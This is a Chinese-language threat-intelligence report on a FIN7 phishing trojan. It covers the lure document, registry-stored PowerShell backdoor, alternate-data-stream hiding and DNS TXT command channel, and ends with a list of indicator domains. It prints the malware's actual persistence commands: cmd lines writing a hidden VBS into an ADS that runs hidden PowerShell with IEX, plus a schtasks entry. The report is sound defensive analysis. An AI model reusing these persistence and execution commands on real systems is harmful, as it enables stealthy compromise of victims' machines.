内容简介:FIN7 APT组织攻击木马分析报告
事件背景
2017年3月,FireEye发布了一篇名黑客组织FIN7的APT攻击简报,报告称FIN7组织以钓鱼邮件为攻击渠道,主要对美国金融机构渗透攻击。组织的攻击利用DNS协议的TXT字段进行C&C通信。360威胁情报中心对此APT组织的攻击链条进行了梳理,对木马相关的技术进行了分析,揭示其一些有意思的技巧。
目标样本
H ash | d04b6410dddee19adec75f597c52e386 |
---|---|
文件类型 | W ord文档 |
文件大小 | 1,834,496 字节 |
攻击特点与攻击流程
FIN7攻击特点主要体现在:
1. 全部攻击过程使用非PE实现,钓鱼使用doc文件,后门使用powershell文件。
2. 使用ADS数据隐藏保存在磁盘中的非PE文件
3. 后门文件保存在注册表中,功能由Powershell实现
4. 与C&C通信使用DNS协议的TXT记录
5. C&C地址从64个硬编码的地址中随机选择
攻击流程:
在整个攻击过程中,没有使用到PE文件,这在一定程度上躲避了安全软件的查杀。落地的文件也进行了技术上的隐藏,而真正的后门程序却已加密的方式存储在注册表中。
攻击者以钓鱼邮件为进入渠道,在恶意文档中嵌入vbs脚本,vbs脚本运行后解密后门程序写入注册表中,同时将调用后门程序的脚本以ads隐藏在磁盘文件中。在后门运行后,使用DNS TXT做为C&C通信方式。
样本分析
钓鱼邮件打开后,显示如下图所示,可以看到,文档中插入了一张图片,图片字体显示模糊。
通过分析,得到了钓鱼文档的制作过程:分别插入了一个 vbs的OLE对象与一张字迹模糊的图片,将OLE对象的图标设置为透明图标并置入图片对象的顶层,最将两个对象组合到一起,这样就达到了双击图片,实际上运行了vbs脚本的目的。
双击图片,就会打开vbs脚本,只有当用户点击弹出的对话框中的确定后,才会运行vbs脚本,如果在这时,用户点击了取消,就可以阻断这次攻击。
为了诱导用户双击图片运行vbs脚本,文档中还写入“ This document is protected by Microsoft Office and requires human verification Please Enable Editing and Double Click on page below. ”(文档被 Microsoft Office 保护,请启用编辑并双击下面的图片)。
VBS 功能:
当上面的图片被双击运行后,程序后台会运行VBS脚本,该脚本功能为:调用powershell解密一大段字符,从代码中可以看出,解密出来的为一gz文件,因此可以将这大段base64解密后,保存成gz格式,使用解压 工具 得到压缩文件继续分析。
样本加载感染过程:
gz中的文件也是一个powershell脚本。脚本经过混淆,实现的功能是:判断当前用户是不是administartor权限,根据不同的权限写入不同的注册表内容,这些内容为开机后会解密执行的代码,随后通过ADS将加载注册表内容的vbs脚本写入 C:\ProgramData\ windows :CtxDnsClient.vbs 文件中,并将该文件加入启动项和计划任务中。
原始的 powershell内容,可以看到powershell脚本经过了混淆:
后门程序写入注册表
P owershell写入到注册表中的后门程序的内容如下:
ADS隐藏磁盘文件
将要实现开机启动的文件写入到磁盘文件 C:\ProgramData\Windows:CtxDnsClient.vbs 中。
对于 Windows:CtxDnsClient.vbs 文件,使用了ADS数据隐藏技术。而通过ADS隐藏的数据在Windows系统中无法显示,文件大小也显示为0字节:
但是使用dir /r命令,可以看到ADS中有隐藏的数据
启动项中的隐藏的ads数据,dump出来后显示如下:
使用 ADS中隐藏数据内容为:
cmd /c "echo Set objShell = CreateObject(""Wscript.shell"") > C:\ProgramData\Windows:CtxDnsClient.vbs" cmd /c "echo objShell.run ""powershell -WindowStyle Hidden -executionpolicy bypass -C IEX ((Get-ItemProperty -Path HKCU:Software\Microsoft\Windows).Part)"",0 >> C:\ProgramData\Windows:CtxDnsClient.vbs"
添加开机启动
创建的启动项,启动项位置为 HKCU \ Software\Microsoft\Windows\CurrentVersion\Run\ :
添加计划任务:
schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\System32\wscript.exe C:\ProgramData\Windows:CtxDnsClient.vbs " /sc onidle /i 30
通过上面这些过程,来实现程序的自启动。在系统重新启动后,启动项中的 wscript.exe 会加载 Windows:CtxDnsClient.vbs , Windows:CtxDnsClient.vbs 中会使用powershell加载 HKCU \ Software\Microsoft\Windows \ Part 内容,part中实现的功能会加载注册表相同位置下的 CtxDnsClient 的内容。这里的内容就是真正的实现CC的功能。
C&C通信功能
这部分功能主要在注册表中的 HKCU \ Software\Microsoft\Windows 下 CtxDnsClient 的内容中,主要功能为:从内置的64个域名中随机选择一个,查询该域名的SPF记录,用来实现自己的C&C通信。
创建名为 ”SourceFireSux” 的互斥体,防止程序重复运行:
编码过的 64个域名地址代码片段:
从这64个域名中,随机选取一个(如这里随机被选择到的为: pbbk.us ),加上www前缀,查询对应DNS TXT记录内容(即查询 www.pbbk.us 的dns txt记录)。
如果返回的内容为idle,则程序睡眠3.5秒到5.4秒的随机时间。
如果返回的内容为www,则表明这个域名现在正在攻击者控制之中,随后查询mail.pbbk.us的dns txt记录。
随后mail.pbbk.us返回的内容就被 powershell直接通过IEX调用执行。
IOC
木马尝试通信的C&C地址:
域名 | 注册人 | 注册时间 | 备注 |
---|---|---|---|
www.grij.us | Frank Walters | 2017/2/19 3:09 | |
www.kwoe.us | Frank Walters | 2017/2/19 3:09 | |
www.zugh.us | Frank Walters | 2017/2/19 3:09 | |
www.pafk.us | Frank Walters | 2017/2/19 3:09 | |
www.cuuo.us | Frank Walters | 2017/2/19 3:07 | |
www.ooyh.us | Frank Walters | 2017/2/19 3:07 | |
www.vxqt.us | Frank Walters | 2017/2/19 3:06 | |
www.cgqy.us | Frank Walters | 2017/2/19 3:07 | |
www.wfsv.us | Frank Walters | 2017/2/19 3:07 | |
www.palj.us | Frank Walters | 2017/2/19 3:09 | |
www.idjb.us | Frank Walters | 2017/2/19 3:09 | |
www.zjav.us | Frank Walters | 2017/2/19 3:09 | |
www.mewt.us | Frank Walters | 2017/2/19 3:06 | |
www.vkpo.us | Frank Walters | 2017/2/19 3:07 | |
www.wqiy.info | WhoisGuard Protected | 2017/2/18 19:08 | |
www.wvzu.pw | WhoisGuard Protected | 2017/2/18 0:00 | |
www.gxhp.top | WhoisGuard Protected | 2017/2/18 19:07 | |
www.hvzr.info | WhoisGuard Protected | 2017/2/18 19:07 | |
www.reld.info | WhoisGuard Protected | 2017/2/18 0:00 | |
www.vqba.info | WhoisGuard Protected | 2017/2/18 19:06 | |
www.oxrp.info | WhoisGuard Protected | 2017/2/18 19:08 | |
www.dvso.pw | WhoisGuard Protected | 2017/2/18 0:00 | |
www.bvyv.club | |||
www.bwuk.club | |||
www.cihr.site | |||
www.coec.club | |||
www.oyaw.club | |||
www.pbbk.us | |||
www.ppdx.pw | |||
www.pvze.club | |||
www.qefg.info | |||
www.qlpa.club | |||
www.ueox.club | |||
www.ufyb.club | |||
www.dbxa.pw | |||
www.eady.club | |||
www.enuv.club | |||
www.eter.pw | |||
www.utca.site | |||
www.vdfe.site | |||
www.vjro.club | |||
www.fbjz.pw | |||
www.fhyi.club | |||
www.futh.pw | |||
www.gnoa.pw | |||
www.vwcq.us | |||
www.jimw.club | |||
www.jomp.site | |||
www.jxhv.site | |||
www.kshv.site | |||
www.ysxy.pw | |||
www.zmyo.club | |||
www.zody.pw | |||
www.lhlv.club | |||
www.lnoy.site | |||
www.lvrm.pw | |||
www.mfka.pw | |||
www.nxpu.site | |||
www.oaax.site | |||
www.odyr.us | |||
www.oknz.club | |||
www.ooep.pw | |||
www.ckwl.pw | Lin Shi Mo Ban | 2015/11/11 0:00 | 不能作为IOC |
www.zcnt.pw | Lin Shi Mo Ban | 2015/11/16 0:00 | 不能作为IOC |
参考链接
*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。